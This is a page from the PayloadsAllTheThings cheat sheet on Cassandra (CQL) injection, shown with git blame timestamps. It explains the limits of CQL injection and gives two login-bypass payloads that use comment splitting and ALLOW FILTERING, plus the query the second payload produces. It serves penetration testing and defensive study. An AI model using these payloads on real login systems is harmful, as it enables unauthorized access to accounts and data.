PayloadsAllTheThings/SQL Injection/Cassandra Injection.md

62 lines
2.0 KiB
Markdown
Raw Permalink Normal View History

# Cassandra Injection
2024-11-03 13:06:53 +00:00
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.
2019-10-29 14:12:49 +00:00
## Summary
2024-11-03 13:06:53 +00:00
* [CQL Injection Limitations](#cql-injection-limitations)
2024-11-30 20:14:51 +00:00
* [Cassandra Comment](#cassandra-comment)
* [Cassandra Login Bypass](#cassandra-login-bypass)
2024-11-03 13:06:53 +00:00
* [Example #1](#example-1)
* [Example #2](#example-2)
2019-10-29 14:12:49 +00:00
* [References](#references)
2024-11-03 13:06:53 +00:00
## CQL Injection Limitations
* Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging.
* Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata.
* Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected.
* Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesnt include a `SLEEP()` function.
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
2024-11-30 20:14:51 +00:00
## Cassandra Comment
```sql
/* Cassandra Comment */
```
2024-11-03 13:06:53 +00:00
2024-11-30 20:14:51 +00:00
## Cassandra Login Bypass
2024-11-03 13:06:53 +00:00
### Example #1
```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```
2024-11-03 13:06:53 +00:00
### Example #2
```sql
username: admin'/*
password: */and pass>'
```
The injection would look like the following SQL query
```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
2024-11-03 13:06:53 +00:00
## References
2024-11-03 13:06:53 +00:00
- [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
- [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)